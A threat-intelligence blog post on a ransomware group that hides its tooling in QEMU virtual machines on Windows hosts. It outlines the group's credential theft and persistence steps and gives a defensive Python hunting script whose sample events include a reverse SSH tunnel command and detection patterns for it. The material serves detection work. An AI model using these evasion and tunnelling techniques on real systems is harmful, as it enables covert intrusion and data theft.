What if your antivirus couldn't see the ransomware running inside a virtual machine on your own computer?

On April 16, 2026, Sophos published a report that reads like a hacker's fever dream: a ransomware group is hiding entire virtual machines inside compromised Windows systems, using a legitimate open-source emulator so that its attack tooling never runs as a process the host's antivirus can inspect.

The group is Payouts King — a new ransomware operation suspected to be built from former BlackBasta affiliates. Their trick? Abusing QEMU, the same virtualization tool developers use to test operating systems, to run hidden Linux VMs that host their entire attack toolkit.

Your EDR sees a QEMU process. Your antivirus sees a QEMU process. Neither sees what runs inside the guest, where attackers are harvesting credentials, exfiltrating data, and preparing to encrypt your entire network.

The Invisible Machine

QEMU is an open-source machine emulator and virtualizer. It's legitimate, widely used by developers and administrators, and rarely flagged by security tools. That's exactly why Payouts King chose it.

Sophos observed two distinct campaigns. In the first — tracked as STAC4713 — attackers:

  • Create a scheduled task named 'TPMProfiler' to launch QEMU as SYSTEM
  • Store the guest's virtual disk in files named to look like benign databases and DLLs rather than carrying a virtual-disk extension
  • Set up reverse SSH tunnels for covert remote access
  • Run Alpine Linux 3.22.0 inside the VM

Inside that Alpine VM, they deploy a full offensive toolkit: AdaptixC2, Chisel, BusyBox, and Rclone for data exfiltration.

The guest is largely invisible to host-based security because endpoint protection instruments the Windows host: its process tree, file system, registry and API calls. Processes inside the guest never appear in the host's process list, the guest's files live inside the disk image rather than on NTFS, and with QEMU's user-mode networking the guest's connections show up on the host as sockets owned by the qemu process. What the host sees is one legitimate-looking process and one large, opaque file.

The Attack Chain

Sophos traced the infection path across multiple incidents:

Initial Access:

  • Exposed SonicWall VPNs (earlier campaigns)
  • SolarWinds Web Help Desk vulnerability (CVE-2025-26399)
  • Exposed Cisco SSL VPNs
  • Microsoft Teams phishing, posing as IT staff and talking employees into opening Quick Assist (installing it if needed) and granting the attacker remote control

Credential Harvesting:

  • Use vssuirun.exe (a legitimate Volume Shadow Copy Service component) to create shadow copies, which makes otherwise locked files readable
  • Copy NTDS.dit plus the SAM and SYSTEM hives out of the shadow copy over SMB
  • Or DLL-sideload the Havoc C2 agent via the legitimate ADNotificationManager.exe
  • Exfiltrate data with Rclone to remote SFTP locations

Persistence & Evasion:

  • The QEMU VM provides long-term access even if the initial foothold is detected
  • All malicious activity runs inside the VM, leaving minimal traces on the host

Campaign #2: CitrixBleed 2 Exploitation

Sophos also tracked a second campaign — STAC3725 — active since February 2026. These attackers exploit CitrixBleed 2 (CVE-2025-5777) in NetScaler ADC/Gateway instances.

After breaching the NetScaler device, they:

  1. Deploy a ZIP archive with a malicious executable
  2. Install a service named 'AppMgmt'
  3. Create a local admin user: CtxAppVCOMService
  4. Install ScreenConnect for remote persistence
  5. Drop and extract a QEMU package
  6. Run a hidden Alpine Linux VM with a custom .qcow2 disk image

Inside this VM, they manually install and build an entire attack arsenal: Impacket, KrbRelayx, Coercer, BloodHound.py, NetExec, Kerbrute, and Metasploit.

Observed activities include credential harvesting, Kerberos username enumeration, Active Directory reconnaissance, and staging data for FTP exfiltration.

Why This Matters

This isn't just another ransomware technique. It's a fundamental evasion strategy that exploits an architectural blind spot in endpoint security.

The problem: most EDR and antivirus products instrument the host operating system. They have no visibility into a guest VM running on that host, and the one artifact they can see, the hypervisor process, belongs to a legitimate tool like QEMU that few environments have a rule for.

The implications:

  • Attackers get a persistent, invisible command-and-control channel
  • Forensic analysis of the host reveals little; the evidence is inside the guest's disk image, so acquire that file intact rather than just the usual host artifacts
  • Security teams may clear the initial infection while missing the QEMU backdoor entirely
  • The technique works against both Windows and Linux targets

Zscaler's analysis of the encryptor itself finds heavy obfuscation, anti-analysis checks, and termination of security tools via low-level system calls (the usual way to sidestep user-mode API hooks). Its encryption scheme uses AES-256 in CTR mode for file contents, RSA-4096 for key protection, and intermittent encryption for larger files.

Detection Guidance

Sophos recommends hunting for these indicators:

  • Unauthorized QEMU installations on endpoints
  • Scheduled tasks running with SYSTEM privileges that launch virtualization software
  • Unusual SSH port forwarding or outbound SSH tunnels on non-standard ports
  • Suspicious virtual disk files (.qcow2, .vmdk, .vhd) in unusual locations
  • Alpine Linux VMs on Windows systems (especially in corporate environments)
  • Processes like qemu-system-x86_64.exe running without legitimate business justification

One caveat on the disk-file indicator: STAC4713 deliberately named its disk images like databases and DLLs, so an extension-based hunt alone misses them. Pull the disk path from the QEMU command line instead, and check file headers where you can (a QCOW2 image starts with the bytes QFI followed by 0xfb, whatever its extension).
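As an added example (not code from the Sophos or Zscaler reports), the following Python turns the STAC4713 artifacts and the hunting indicators above into detection logic and runs it over a few constructed Sysmon-style events. The approved install directory, the event field names, and every path, user, task and IP address in the samples are assumptions made for the example.

```python
"""Hunt for attacker-run QEMU guests on Windows endpoints.

Added example, not code from the Sophos or Zscaler reports. Field names follow
Sysmon EID 1 (ProcessCreate), EID 3 (NetworkConnect) and Security EID 4698
(scheduled task created); every sample event below is constructed.
"""
import ntpath
import re

QEMU_BINARIES = {"qemu-system-x86_64.exe", "qemu-system-x86_64w.exe",
                 "qemu-system-i386.exe", "qemu-system-aarch64.exe", "qemu.exe"}
# Assumption: the only directory where an approved QEMU install may live.
APPROVED_QEMU_DIRS = ("c:\\program files\\qemu\\",)
DISK_EXTENSIONS = {".qcow2", ".qcow", ".vmdk", ".vhd", ".vhdx", ".img", ".iso", ".raw"}
SYSTEM_MARKERS = ("s-1-5-18", "nt authority\\system")
_DISK_ARG = re.compile(r'-(hd[abcd]|cdrom|drive)\s+("[^"]+"|\S+)', re.I)
_HOSTFWD = re.compile(r"hostfwd=(?:tcp|udp):[^,\s]*", re.I)


def is_qemu(image):
    return ntpath.basename(image).lower() in QEMU_BINARIES


def guest_disk_paths(cmdline):
    """Guest disk paths from '-hda <file>'/'-cdrom <file>' and '-drive file=<file>,...'."""
    paths = []
    for m in _DISK_ARG.finditer(cmdline):
        opt, token = m.group(1).lower(), m.group(2).strip('"')
        if opt == "drive":
            paths += [p[5:] for p in token.split(",") if p.lower().startswith("file=")]
        else:
            paths.append(token)
    return paths


def check_process(ev):
    """Sysmon EID 1: QEMU launched oddly, or a host-side reverse SSH tunnel."""
    hits = []
    image, cmd, user = ev.get("Image", ""), ev.get("CommandLine", ""), ev.get("User", "")
    if is_qemu(image):
        if not image.lower().startswith(APPROVED_QEMU_DIRS):
            hits.append(("qemu_unapproved_path", image))
        if user.lower() in SYSTEM_MARKERS:
            hits.append(("qemu_as_system", user))
        if re.search(r"-display\s+none|-nographic", cmd):
            hits.append(("qemu_headless", image))
        for path in guest_disk_paths(cmd):
            # A disk image renamed to .db or .dll defeats extension-only hunts.
            if ntpath.splitext(path)[1].lower() not in DISK_EXTENSIONS:
                hits.append(("qemu_disguised_disk", path))
        hits += [("qemu_port_forward", m.group(0)) for m in _HOSTFWD.finditer(cmd)]
    if ntpath.basename(image).lower() in ("ssh.exe", "plink.exe") and re.search(r"\s-R\s", cmd):
        hits.append(("ssh_reverse_tunnel", cmd))
    return hits


def check_network(ev):
    """Sysmon EID 3: under user-mode networking the guest's traffic belongs to the qemu process."""
    image = ev.get("Image", "")
    if is_qemu(image) and not image.lower().startswith(APPROVED_QEMU_DIRS):
        return [("qemu_outbound", f"{ev['DestinationIp']}:{ev['DestinationPort']}")]
    return []


def check_task(ev):
    """Security EID 4698: a scheduled task whose action starts QEMU as SYSTEM."""
    content = ev.get("TaskContent", "").lower()
    if any(b in content for b in QEMU_BINARIES) and any(s in content for s in SYSTEM_MARKERS):
        return [("task_launches_vm_as_system", ev.get("TaskName", ""))]
    return []


CHECKS = {1: check_process, 3: check_network, 4698: check_task}


def hunt(events):
    """Apply the rule set for each event type; returns (rule, detail) tuples."""
    return [hit for ev in events for hit in CHECKS.get(ev.get("EventID"), lambda e: [])(ev)]


# Constructed events: a hidden VM started as SYSTEM, its task and its outbound
# connection, a legitimate developer VM, and a reverse SSH tunnel.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\ProgramData\TPM\qemu-system-x86_64.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r'"C:\ProgramData\TPM\qemu-system-x86_64.exe" -m 512 -display none '
                    r"-netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0 "
                    r"-drive file=C:\ProgramData\TPM\profiles.db,format=qcow2"},
    {"EventID": 4698, "TaskName": r"\TPMProfiler",
     "TaskContent": r"<Task><Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
                    r"<Actions><Exec><Command>C:\ProgramData\TPM\qemu-system-x86_64.exe</Command></Exec></Actions></Task>"},
    {"EventID": 3, "Image": r"C:\ProgramData\TPM\qemu-system-x86_64.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe", "User": "CORP\\devuser",
     "CommandLine": r'"C:\Program Files\qemu\qemu-system-x86_64.exe" -m 2048 -drive file=C:\Users\devuser\vms\test.qcow2,format=qcow2'},
    {"EventID": 1, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "User": "CORP\\svc-backup",
     "CommandLine": "ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:2222 -p 8443 ops@203.0.113.10"},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:28s} {detail}")
```

The developer's VM in the samples produces no findings, which is the point of anchoring the rules on install path, launching user, headless flags, disguised disk names and port forwards rather than on the mere presence of QEMU. Because the field names mirror what Sysmon and the Security log emit, each rule ports directly to a SIEM query; pair the disguised-disk rule with a file-header check on the flagged path when you have file access.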

The Bigger Picture

Payouts King represents a generation of ransomware operators who understand enterprise security architecture well enough to exploit its blind spots. By weaponizing legitimate virtualization tools, they're not just evading detection; they're running their operation in a layer that most endpoint stacks were never designed to inspect.

The question isn't whether more groups will adopt this technique. It's how long until they do.


Published: April 25, 2026
Sources: Sophos Threat Report (April 16, 2026), Zscaler ThreatLabz (April 2026), BleepingComputer

Tags: #ransomware #qemu #virtualization #edr-bypass #payouts-king #blackbasta #cybersecurity #threat-intelligence